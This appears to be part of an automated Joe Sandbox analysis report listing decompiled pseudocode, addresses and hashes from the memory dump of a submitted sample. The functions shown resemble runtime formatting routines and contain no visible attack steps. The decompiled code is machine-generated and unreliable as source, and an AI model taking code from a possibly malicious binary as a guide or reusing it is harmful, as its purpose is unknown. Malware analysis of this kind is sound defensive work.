                                                                                                                                                                                                                                                        				if ( *_t126 >= 0) goto 0xe5ac0c39;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac0d23;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac0d3a;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0c72;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac0c9b;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac0c06;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac0c06;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac0c06;
                                                                                                                                                                                                                                                        				goto 0xe5ac0bf2;
                                                                                                                                                                                                                                                        				_t118 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t118 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
                                                                                                                                                                                                                                                        				goto 0xe5ac0d92;
                                                                                                                                                                                                                                                        				_t129 =  *((intOrPtr*)(_t128 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0d1c;
                                                                                                                                                                                                                                                        				_t144 =  *_t129;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				goto 0xe5ac0c22;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFE88(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
                                                                                                                                                                                                                                                        				if (_t144 != 0) goto 0xe5ac0d43;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t123 + 0x4c)) = 1;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t154 != _t154) goto 0xe5ac0d5c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC19C4(0, _t123, _t144, _t153);
                                                                                                                                                                                                                                                        				goto 0xe5ac0d63;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1640(0,  *_t129, _t123, _t153);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0d90;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xe5ac0d81;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xe5ac0d90;
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
                                                                                                                                                                                                                                                        				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                        0x7ff6e5ac0ba4
                                                                                                                                                                                                                                                        0x7ff6e5ac0ba7
                                                                                                                                                                                                                                                        0x7ff6e5ac0bab
                                                                                                                                                                                                                                                        0x7ff6e5ac0baf
                                                                                                                                                                                                                                                        0x7ff6e5ac0bb3
                                                                                                                                                                                                                                                        0x7ff6e5ac0bb7
                                                                                                                                                                                                                                                        0x7ff6e5ac0bbd
                                                                                                                                                                                                                                                        0x7ff6e5ac0bc1
                                                                                                                                                                                                                                                        0x7ff6e5ac0bc4
                                                                                                                                                                                                                                                        0x7ff6e5ac0bc7
                                                                                                                                                                                                                                                        0x7ff6e5ac0bcd
                                                                                                                                                                                                                                                        0x7ff6e5ac0bd1
                                                                                                                                                                                                                                                        0x7ff6e5ac0bd7
                                                                                                                                                                                                                                                        0x7ff6e5ac0bd9
                                                                                                                                                                                                                                                        0x7ff6e5ac0bdc
                                                                                                                                                                                                                                                        0x7ff6e5ac0be2
                                                                                                                                                                                                                                                        0x7ff6e5ac0be6
                                                                                                                                                                                                                                                        0x7ff6e5ac0bec
                                                                                                                                                                                                                                                        0x7ff6e5ac0bf0
                                                                                                                                                                                                                                                        0x7ff6e5ac0bf2
                                                                                                                                                                                                                                                        0x7ff6e5ac0bf6
                                                                                                                                                                                                                                                        0x7ff6e5ac0c00
                                                                                                                                                                                                                                                        0x7ff6e5ac0c06
                                                                                                                                                                                                                                                        0x7ff6e5ac0c0c
                                                                                                                                                                                                                                                        0x7ff6e5ac0c1b
                                                                                                                                                                                                                                                        0x7ff6e5ac0c29
                                                                                                                                                                                                                                                        0x7ff6e5ac0c2e
                                                                                                                                                                                                                                                        0x7ff6e5ac0c36
                                                                                                                                                                                                                                                        0x7ff6e5ac0c3d
                                                                                                                                                                                                                                                        0x7ff6e5ac0c43
                                                                                                                                                                                                                                                        0x7ff6e5ac0c4a
                                                                                                                                                                                                                                                        0x7ff6e5ac0c57
                                                                                                                                                                                                                                                        0x7ff6e5ac0c66
                                                                                                                                                                                                                                                        0x7ff6e5ac0c6a
                                                                                                                                                                                                                                                        0x7ff6e5ac0c70
                                                                                                                                                                                                                                                        0x7ff6e5ac0c75
                                                                                                                                                                                                                                                        0x7ff6e5ac0c7f
                                                                                                                                                                                                                                                        0x7ff6e5ac0c88
                                                                                                                                                                                                                                                        0x7ff6e5ac0c8f
                                                                                                                                                                                                                                                        0x7ff6e5ac0c93
                                                                                                                                                                                                                                                        0x7ff6e5ac0c99
                                                                                                                                                                                                                                                        0x7ff6e5ac0c9e
                                                                                                                                                                                                                                                        0x7ff6e5ac0ca0
                                                                                                                                                                                                                                                        0x7ff6e5ac0ca4
                                                                                                                                                                                                                                                        0x7ff6e5ac0caa
                                                                                                                                                                                                                                                        0x7ff6e5ac0cae
                                                                                                                                                                                                                                                        0x7ff6e5ac0cb4
                                                                                                                                                                                                                                                        0x7ff6e5ac0cb8
                                                                                                                                                                                                                                                        0x7ff6e5ac0cbe
                                                                                                                                                                                                                                                        0x7ff6e5ac0cc3
                                                                                                                                                                                                                                                        0x7ff6e5ac0cc7
                                                                                                                                                                                                                                                        0x7ff6e5ac0cca
                                                                                                                                                                                                                                                        0x7ff6e5ac0ccf
                                                                                                                                                                                                                                                        0x7ff6e5ac0cd3
                                                                                                                                                                                                                                                        0x7ff6e5ac0ce0
                                                                                                                                                                                                                                                        0x7ff6e5ac0ce5
                                                                                                                                                                                                                                                        0x7ff6e5ac0ceb
                                                                                                                                                                                                                                                        0x7ff6e5ac0cf2
                                                                                                                                                                                                                                                        0x7ff6e5ac0cff
                                                                                                                                                                                                                                                        0x7ff6e5ac0d0e
                                                                                                                                                                                                                                                        0x7ff6e5ac0d12
                                                                                                                                                                                                                                                        0x7ff6e5ac0d14
                                                                                                                                                                                                                                                        0x7ff6e5ac0d17
                                                                                                                                                                                                                                                        0x7ff6e5ac0d1e
                                                                                                                                                                                                                                                        0x7ff6e5ac0d2e
                                                                                                                                                                                                                                                        0x7ff6e5ac0d35
                                                                                                                                                                                                                                                        0x7ff6e5ac0d3d
                                                                                                                                                                                                                                                        0x7ff6e5ac0d3f
                                                                                                                                                                                                                                                        0x7ff6e5ac0d43
                                                                                                                                                                                                                                                        0x7ff6e5ac0d47
                                                                                                                                                                                                                                                        0x7ff6e5ac0d50
                                                                                                                                                                                                                                                        0x7ff6e5ac0d55
                                                                                                                                                                                                                                                        0x7ff6e5ac0d5a
                                                                                                                                                                                                                                                        0x7ff6e5ac0d5e
                                                                                                                                                                                                                                                        0x7ff6e5ac0d6b
                                                                                                                                                                                                                                                        0x7ff6e5ac0d76
                                                                                                                                                                                                                                                        0x7ff6e5ac0d7f
                                                                                                                                                                                                                                                        0x7ff6e5ac0d81
                                                                                                                                                                                                                                                        0x7ff6e5ac0d8a
                                                                                                                                                                                                                                                        0x7ff6e5ac0d8d
                                                                                                                                                                                                                                                        0x7ff6e5ac0dac

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                                                                        • Instruction ID: 2761d36ecc833b91d28b1cc76156b24b7fc80d21d60d44d064fb7e6bd1c5e00a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72513777B18A5186E7258A2DD06032D27A0FF54F68F245131CA8DDB795CF2BEC42C785
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC0DB0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                                                                                                        				char* _t127;
                                                                                                                                                                                                                                                        				intOrPtr* _t128;
                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t113 = _t147;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t152);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t122 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t97 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t97 > 0) goto 0xe5ac0eac;
                                                                                                                                                                                                                                                        				if (_t97 == 0) goto 0xe5ac0e12;
                                                                                                                                                                                                                                                        				_t98 = r8d;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0f03;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0e83;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0e5b;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0f03;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac0ecf;
                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t125 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0e45;
                                                                                                                                                                                                                                                        				if ( *_t125 >= 0) goto 0xe5ac0e45;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac0f2f;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac0f46;
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0e7e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0ea7;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0e12;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0e12;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0e12;
                                                                                                                                                                                                                                                        				goto 0xe5ac0dfe;
                                                                                                                                                                                                                                                        				_t117 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t117 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
                                                                                                                                                                                                                                                        				goto 0xe5ac0f98;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0f28;
                                                                                                                                                                                                                                                        				_t143 =  *_t128;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0e2e;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFDE0(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
                                                                                                                                                                                                                                                        				if (_t143 != 0) goto 0xe5ac0f4f;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t122 + 0x4c)) = 0;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t152 != _t152) goto 0xe5ac0f68;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1A4C(_t122, _t122, _t143);
                                                                                                                                                                                                                                                        				goto 0xe5ac0f6f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC16C4( *_t128, _t122, _t122, _t143);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0f96;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xe5ac0f88;
                                                                                                                                                                                                                                                        				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xe5ac0f96;
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                        0x7ff6e5ac0db0
                                                                                                                                                                                                                                                        0x7ff6e5ac0db3
                                                                                                                                                                                                                                                        0x7ff6e5ac0db7
                                                                                                                                                                                                                                                        0x7ff6e5ac0dbb
                                                                                                                                                                                                                                                        0x7ff6e5ac0dbf
                                                                                                                                                                                                                                                        0x7ff6e5ac0dc3
                                                                                                                                                                                                                                                        0x7ff6e5ac0dc9
                                                                                                                                                                                                                                                        0x7ff6e5ac0dcd
                                                                                                                                                                                                                                                        0x7ff6e5ac0dd0
                                                                                                                                                                                                                                                        0x7ff6e5ac0dd3
                                                                                                                                                                                                                                                        0x7ff6e5ac0dd9
                                                                                                                                                                                                                                                        0x7ff6e5ac0ddd
                                                                                                                                                                                                                                                        0x7ff6e5ac0de3
                                                                                                                                                                                                                                                        0x7ff6e5ac0de5
                                                                                                                                                                                                                                                        0x7ff6e5ac0de8
                                                                                                                                                                                                                                                        0x7ff6e5ac0dee
                                                                                                                                                                                                                                                        0x7ff6e5ac0df2
                                                                                                                                                                                                                                                        0x7ff6e5ac0df8
                                                                                                                                                                                                                                                        0x7ff6e5ac0dfc
                                                                                                                                                                                                                                                        0x7ff6e5ac0dfe
                                                                                                                                                                                                                                                        0x7ff6e5ac0e02
                                                                                                                                                                                                                                                        0x7ff6e5ac0e0c
                                                                                                                                                                                                                                                        0x7ff6e5ac0e12
                                                                                                                                                                                                                                                        0x7ff6e5ac0e18
                                                                                                                                                                                                                                                        0x7ff6e5ac0e27
                                                                                                                                                                                                                                                        0x7ff6e5ac0e35
                                                                                                                                                                                                                                                        0x7ff6e5ac0e3a
                                                                                                                                                                                                                                                        0x7ff6e5ac0e42
                                                                                                                                                                                                                                                        0x7ff6e5ac0e49
                                                                                                                                                                                                                                                        0x7ff6e5ac0e4f
                                                                                                                                                                                                                                                        0x7ff6e5ac0e56
                                                                                                                                                                                                                                                        0x7ff6e5ac0e63
                                                                                                                                                                                                                                                        0x7ff6e5ac0e72
                                                                                                                                                                                                                                                        0x7ff6e5ac0e76
                                                                                                                                                                                                                                                        0x7ff6e5ac0e7c
                                                                                                                                                                                                                                                        0x7ff6e5ac0e81
                                                                                                                                                                                                                                                        0x7ff6e5ac0e8b
                                                                                                                                                                                                                                                        0x7ff6e5ac0e94
                                                                                                                                                                                                                                                        0x7ff6e5ac0e9b
                                                                                                                                                                                                                                                        0x7ff6e5ac0e9f
                                                                                                                                                                                                                                                        0x7ff6e5ac0ea5
                                                                                                                                                                                                                                                        0x7ff6e5ac0eaa
                                                                                                                                                                                                                                                        0x7ff6e5ac0eac
                                                                                                                                                                                                                                                        0x7ff6e5ac0eb0
                                                                                                                                                                                                                                                        0x7ff6e5ac0eb6
                                                                                                                                                                                                                                                        0x7ff6e5ac0eba
                                                                                                                                                                                                                                                        0x7ff6e5ac0ec0
                                                                                                                                                                                                                                                        0x7ff6e5ac0ec4
                                                                                                                                                                                                                                                        0x7ff6e5ac0eca
                                                                                                                                                                                                                                                        0x7ff6e5ac0ecf
                                                                                                                                                                                                                                                        0x7ff6e5ac0ed3
                                                                                                                                                                                                                                                        0x7ff6e5ac0ed6
                                                                                                                                                                                                                                                        0x7ff6e5ac0edb
                                                                                                                                                                                                                                                        0x7ff6e5ac0edf
                                                                                                                                                                                                                                                        0x7ff6e5ac0eec
                                                                                                                                                                                                                                                        0x7ff6e5ac0ef1
                                                                                                                                                                                                                                                        0x7ff6e5ac0ef7
                                                                                                                                                                                                                                                        0x7ff6e5ac0efe
                                                                                                                                                                                                                                                        0x7ff6e5ac0f0b
                                                                                                                                                                                                                                                        0x7ff6e5ac0f1a
                                                                                                                                                                                                                                                        0x7ff6e5ac0f1e
                                                                                                                                                                                                                                                        0x7ff6e5ac0f20
                                                                                                                                                                                                                                                        0x7ff6e5ac0f23
                                                                                                                                                                                                                                                        0x7ff6e5ac0f2a
                                                                                                                                                                                                                                                        0x7ff6e5ac0f3a
                                                                                                                                                                                                                                                        0x7ff6e5ac0f41
                                                                                                                                                                                                                                                        0x7ff6e5ac0f49
                                                                                                                                                                                                                                                        0x7ff6e5ac0f4b
                                                                                                                                                                                                                                                        0x7ff6e5ac0f4f
                                                                                                                                                                                                                                                        0x7ff6e5ac0f53
                                                                                                                                                                                                                                                        0x7ff6e5ac0f5c
                                                                                                                                                                                                                                                        0x7ff6e5ac0f61
                                                                                                                                                                                                                                                        0x7ff6e5ac0f66
                                                                                                                                                                                                                                                        0x7ff6e5ac0f6a
                                                                                                                                                                                                                                                        0x7ff6e5ac0f77
                                                                                                                                                                                                                                                        0x7ff6e5ac0f7d
                                                                                                                                                                                                                                                        0x7ff6e5ac0f86
                                                                                                                                                                                                                                                        0x7ff6e5ac0f88
                                                                                                                                                                                                                                                        0x7ff6e5ac0f90
                                                                                                                                                                                                                                                        0x7ff6e5ac0f93
                                                                                                                                                                                                                                                        0x7ff6e5ac0fb2

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                                                                        • Instruction ID: 3a961b11eec4a3f3d9052e4519dbfa4aef8f9b3fd054163d1ccf7a33658c244b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 56516837B1865186E7648A2DC06032C27A0FF49F58F244131CA4DDB7A9CF2BED92C785
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC11C0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                                                                                                        				char* _t127;
                                                                                                                                                                                                                                                        				intOrPtr* _t128;
                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t113 = _t147;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t152);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t122 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t97 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t97 > 0) goto 0xe5ac12bc;
                                                                                                                                                                                                                                                        				if (_t97 == 0) goto 0xe5ac1222;
                                                                                                                                                                                                                                                        				_t98 = r8d;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac1313;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac1293;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac126b;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac1313;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac12df;
